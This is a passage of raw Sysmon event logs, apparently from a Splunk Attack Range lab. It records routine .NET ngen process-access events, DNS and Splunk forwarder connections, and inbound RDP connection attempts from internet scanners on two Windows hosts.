14:58:46.591{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-C80E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.575{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-C80E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.575{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-C80E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000080759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.080{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57605-false10.0.1.12-8000- 354300x800000000000000080758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.469{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-57001- 354300x800000000000000080757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.453{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-57602- 354300x800000000000000080756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.441{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local54561- 354300x800000000000000080755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.438{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57001- 354300x800000000000000080754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.438{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53919- 354300x800000000000000080753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.436{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57602- 354300x800000000000000080752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.425{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57916- 10341000x800000000000000080751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.528{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-C70E-00000000BB01}5652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.513{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-C70E-00000000BB01}5652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.513{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-C70E-00000000BB01}5652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.435{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=46DDF324C40055D2969206EF740C36F9,SHA256=B419F96937DE95A1DD1BB40243C2F0A16AFDDF325707BDD0CA3EBAD4C30EF8BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.091{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-C60E-00000000BB01}5512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.075{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-C60E-00000000BB01}5512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.075{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-C60E-00000000BB01}5512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.013{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-C50E-00000000BB01}1528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.013{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-C50E-00000000BB01}1528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.013{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-C50E-00000000BB01}1528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050586Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:44.815{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com56062-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050585Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:44.701{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52541-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050584Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:44.408{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49687-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050583Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:44.269{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63138-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050582Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:46.283{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7705D6EC9B75F29D4D370C3B9138404,SHA256=B770792C3A0BEE72C9132314F11920D58D901C45FCBF5612F2490340610AE674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050581Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:46.252{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D52544718703529E88A27161DCF5CCFB,SHA256=8D308F657D4EB1777C34D1D3543B81F0C29D724B416D1A87361EA242FDB01DF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.966{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-DD0E-00000000BB01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.950{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-DD0E-00000000BB01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.950{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-DD0E-00000000BB01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.903{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-DC0E-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.888{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-DC0E-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.888{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-DC0E-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 